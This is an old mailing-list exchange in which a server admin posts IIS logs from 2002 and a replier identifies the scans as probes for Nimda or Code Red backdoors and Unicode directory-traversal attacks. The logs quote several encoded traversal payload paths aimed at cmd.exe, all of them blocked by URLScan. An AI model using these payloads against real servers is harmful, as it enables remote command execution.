> 
> 
> Hello all and forgive my ignorance in this area.
Hello

> 
> Below is a snippet from the logs.  Can anyone tell by 
> looking at it:
> 
> 1.  What type of vulnerabilities were they looking for?

look downward


> 2.  Does the fact the it says <Rejected by urlscan> imply 
> that URLScan from M$
> is loaded.  I didn't do this myself...thats why I'm curious.

I don't know really too.

> 3.  What is the best course of action in regards to the 
> individual attempting
> these activities?  I traced the IP back to RoadRunner.  
> Should I call their
> customer service and complain or am I just pissing in the 
> wind?

you will piss in the wind i think ...

> 4.  I did run the IIS Lockdown wizard.  Is that sufficient 
> for most types of
> attacks?  What other tools should I consider running?

Don't hesitate to apply security paatch as soon as they are released !



> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/root.exe 404 123 -

This test if your IIS has been infected by virus like nimbda
or code red. root.exe is a copy of cmd.exe to give access
to console via web.

> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/MSADC/root.exe 404 123 -

IDEM (i suppose)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/c/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/d/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 

IDEM

> GET /<Rejected-By-UrlScan>
> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -

This test a unicode vulnerability (the dot dot attack)
scripts got the execute rights so they try to execute cmd.exe
to access to the console via web :)

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/_vti_bin/..%255c../..%255c../..%
> 255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/_mem_bin/..%255c../..%255c../..%
> 255c../winnt/system32/cmd.exe 404 123 -

IDEM

> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
> 1c../..%c1%1c../winnt/system32/cmd.exe

IDEM

> 404 123 -
> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
> GET /<Rejected-By-UrlScan>
> ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

IDEM for all

> 
> Thanks so much for this great list.
> 
> Craig Brauckmiller
> 

Reply via email to